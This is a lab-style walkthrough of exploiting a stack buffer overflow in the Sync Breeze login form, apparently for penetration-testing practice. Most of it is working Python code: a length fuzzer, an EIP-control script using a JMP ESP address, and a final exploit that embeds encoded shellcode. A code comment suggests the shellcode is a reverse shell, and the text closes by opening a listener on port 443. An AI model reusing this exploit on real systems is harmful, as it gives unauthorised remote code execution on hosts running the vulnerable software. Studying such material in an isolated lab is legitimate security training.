Sync Breeze

Scan machine
We start by scanning port numbers with the unicornscan tool, which is faster than nmap. You can install it with this command: sudo apt install unicornscan
Screenshot 2025-03-13 231202.png sudo unicornscan -ImT 10.0.2.4:1-2000 # 1-2000: scan ports from 1 to 2000
We discovered that these ports are open; let's find out which service is running on each port.

After some research we find that this is an old version which is vulnerable to a buffer overflow (BOF), so let's download this service and try to exploit it in our own environment.
Fuzzing
Open the browser and Wireshark, then look at the request that was sent.
Screenshot 2025-03-13 231447.png Try to write Python code that crashes the vulnerable service.
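#!/bin/python3
"""Length fuzzer for the Sync Breeze login form.

Sends POST /login with a growing ``username`` value (starting at 100 bytes
and growing by 100 each round) until the service stops answering.  The size
at which the connection fails is the input length that crashes the service.
"""
import socket
import sys
import time

target_ip = "10.0.2.4"
target_port = 80
start = 100
step = 100


def build_request(size: int) -> bytes:
    """Return the raw HTTP request carrying a ``username`` of *size* 'A's.

    Every header line gets its CRLF from the join, so no header can be fused
    with the next one, and Content-Length is computed from the body actually
    sent so the server reads exactly those bytes.
    """
    payload = "username=" + "A" * size + "&password=1234"
    headers = [
        "POST /login HTTP/1.1",
        "Host: 10.0.2.4",
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(payload)}",
        "Origin: http://10.0.2.4",
        "Connection: keep-alive",
        "Referer: http://10.0.2.4/login",
        "Upgrade-Insecure-Requests: 1",
        "Priority: u=0, i",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + payload).encode()


def fuzz() -> None:
    """Grow the payload each round until the connection fails, then report the size."""
    size = start
    while True:
        try:
            request = build_request(size)
            # A timeout turns a hung (crashed but still listening) service
            # into a reported failure instead of blocking forever on recv().
            with socket.create_connection((target_ip, target_port), timeout=5) as s:
                print(f"Sending {size} bytes...")
                s.sendall(request)
                response = s.recv(1024)
                print(f"Response: {response.decode(errors='ignore')}")
            print(f"Trying payload size: {size} bytes...")
            size += step
            time.sleep(1)
        except OSError as e:
            # Refused/reset connection or timeout: the service stopped answering
            # at this size.  Only socket errors are caught, so a bug in the
            # script itself is not misreported as a crash.
            print(f"Fuzzing crashed at {size} bytes")
            print(f"Reason: {e}")
            sys.exit()


if __name__ == "__main__":
    fuzz()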
Run this script and we will notice that the target crashes after 800 characters are sent.
1.png Locate the offset
Generate a pattern to find the offset using Metasploit:

./pattern_create.rb -l 800
Then send it with the Python script; we will notice that the target crashes again.

The offset is 780.
Let's find out which four bytes overwrite EIP.

Hijack execution
Use the nasm shell tool to translate JMP ESP into its opcode.

Use mona to search for this opcode; we found it at address 10090C83.
After converting this address to little-endian:

#!/bin/python3
"""EIP-control check for the Sync Breeze login overflow.

After the 780 filler bytes (the offset found with the pattern), the next four
bytes are the address 10090C83 (JMP ESP, located with mona) written
little-endian.  The 16 'C' bytes after it appear to serve only as a marker
for what sits at ESP once the jump is taken.
"""
import socket
import sys
import time

target_ip = "10.0.2.4"
target_port = 80

# 780 bytes to EIP | return address, little-endian | marker bytes
add = b"A" * 780 + b"\x83\x0C\x09\x10" + b"C" * 16
payload = b"username=" + add + b"&password=1234"

# One entry per header line; the join supplies the CRLF after each one.
header_lines = [
    b"POST /login HTTP/1.1",
    b"Host: 10.0.2.4",
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
    b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    b"Accept-Language: en-US,en;q=0.5",
    b"Accept-Encoding: gzip, deflate",
    b"Content-Type: application/x-www-form-urlencoded",
    # Length of the body actually sent, so the server reads it whole.
    b"Content-Length: " + str(len(payload)).encode(),
    b"Origin: http://10.0.2.4",
    b"Connection: close",
    b"Referer: http://10.0.2.4/login",
    b"Upgrade-Insecure-Requests: 1",
    b"Priority: u=0, i",
]
request = b"\r\n".join(header_lines) + b"\r\n\r\n" + payload

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target_ip, target_port))
    s.sendall(request)
    response = s.recv(4096)
    print(f"Response: {response.decode(errors='ignore')}")
Craft shellcode
Discover the bad characters, then generate the shellcode.

#!/bin/python3
# Final stage of the Sync Breeze login overflow: the same request as the
# EIP-control script, with the marker bytes replaced by a NOP sled and the
# generated shellcode.
import socket
import sys
import time
target_ip = "10.0.2.4"
target_port = 80
# ESP add 10090C83 -- the JMP ESP address found with mona; it is written
# little-endian (\x83\x0C\x09\x10) in `add` below.
# Generated, encoded shellcode.  NOTE(review): the bad-character list used
# when generating it is not recorded on this page -- record it, since any
# byte the service mangles silently corrupts the payload.  Presumably a
# reverse shell to the port-443 listener mentioned after this script;
# confirm against the generator command line.
buf = b""
buf += b"\xd9\xc4\xd9\x74\x24\xf4\x5d\xba\xc3\xd9\xbf\x94"
buf += b"\x29\xc9\xb1\x52\x31\x55\x17\x83\xed\xfc\x03\x96"
buf += b"\xca\x5d\x61\xe4\x05\x23\x8a\x14\xd6\x44\x02\xf1"
buf += b"\xe7\x44\x70\x72\x57\x75\xf2\xd6\x54\xfe\x56\xc2"
buf += b"\xef\x72\x7f\xe5\x58\x38\x59\xc8\x59\x11\x99\x4b"
buf += b"\xda\x68\xce\xab\xe3\xa2\x03\xaa\x24\xde\xee\xfe"
buf += b"\xfd\x94\x5d\xee\x8a\xe1\x5d\x85\xc1\xe4\xe5\x7a"
buf += b"\x91\x07\xc7\x2d\xa9\x51\xc7\xcc\x7e\xea\x4e\xd6"
buf += b"\x63\xd7\x19\x6d\x57\xa3\x9b\xa7\xa9\x4c\x37\x86"
buf += b"\x05\xbf\x49\xcf\xa2\x20\x3c\x39\xd1\xdd\x47\xfe"
buf += b"\xab\x39\xcd\xe4\x0c\xc9\x75\xc0\xad\x1e\xe3\x83"
buf += b"\xa2\xeb\x67\xcb\xa6\xea\xa4\x60\xd2\x67\x4b\xa6"
buf += b"\x52\x33\x68\x62\x3e\xe7\x11\x33\x9a\x46\x2d\x23"
buf += b"\x45\x36\x8b\x28\x68\x23\xa6\x73\xe5\x80\x8b\x8b"
buf += b"\xf5\x8e\x9c\xf8\xc7\x11\x37\x96\x6b\xd9\x91\x61"
buf += b"\x8b\xf0\x66\xfd\x72\xfb\x96\xd4\xb0\xaf\xc6\x4e"
buf += b"\x10\xd0\x8c\x8e\x9d\x05\x02\xde\x31\xf6\xe3\x8e"
buf += b"\xf1\xa6\x8b\xc4\xfd\x99\xac\xe7\xd7\xb1\x47\x12"
buf += b"\xb0\xb7\x97\x1e\x45\xa0\x95\x1e\x44\x8b\x13\xf8"
buf += b"\x2c\xfb\x75\x53\xd9\x62\xdc\x2f\x78\x6a\xca\x4a"
buf += b"\xba\xe0\xf9\xab\x75\x01\x77\xbf\xe2\xe1\xc2\x9d"
buf += b"\xa5\xfe\xf8\x89\x2a\x6c\x67\x49\x24\x8d\x30\x1e"
buf += b"\x61\x63\x49\xca\x9f\xda\xe3\xe8\x5d\xba\xcc\xa8"
buf += b"\xb9\x7f\xd2\x31\x4f\x3b\xf0\x21\x89\xc4\xbc\x15"
buf += b"\x45\x93\x6a\xc3\x23\x4d\xdd\xbd\xfd\x22\xb7\x29"
buf += b"\x7b\x09\x08\x2f\x84\x44\xfe\xcf\x35\x31\x47\xf0"
buf += b"\xfa\xd5\x4f\x89\xe6\x45\xaf\x40\xa3\x76\xfa\xc8"
buf += b"\x82\x1e\xa3\x99\x96\x42\x54\x74\xd4\x7a\xd7\x7c"
buf += b"\xa5\x78\xc7\xf5\xa0\xc5\x4f\xe6\xd8\x56\x3a\x08"
buf += b"\x4e\x56\x6f"
# Layout: 780 bytes to reach EIP | JMP ESP address, little-endian | 32-byte
# NOP sled where execution is meant to land after the jump | shellcode.
add = b"A" * 780 + b"\x83\x0C\x09\x10" + b"\x90" * 32+buf
payload = b"username=" + add + b"&password=1234"
# Raw HTTP POST mirroring the browser request captured in Wireshark.
request = b"POST /login HTTP/1.1\r\n"
request += b"Host: 10.0.2.4\r\n"
request += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0\r\n"
request += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
request += b"Accept-Language: en-US,en;q=0.5\r\n"
request += b"Accept-Encoding: gzip, deflate\r\n"
request += b"Content-Type: application/x-www-form-urlencoded\r\n"
# Length of the final body, so the server reads the whole payload.
request += b"Content-Length: " + str(len(payload)).encode() + b"\r\n"
request += b"Origin: http://10.0.2.4\r\n"
request += b"Connection: close\r\n"
request += b"Referer: http://10.0.2.4/login\r\n"
request += b"Upgrade-Insecure-Requests: 1\r\n"
request += b"Priority: u=0, i\r\n"
request += b"\r\n"
request += payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.sendall(request)
# Only the first 4096 bytes of any reply are read; a crashed service may
# return nothing at all.
response = s.recv(4096)
print(f"Response: {response.decode(errors='ignore')}")
s.close()
Execute shellcode
Open a listener on port 443.
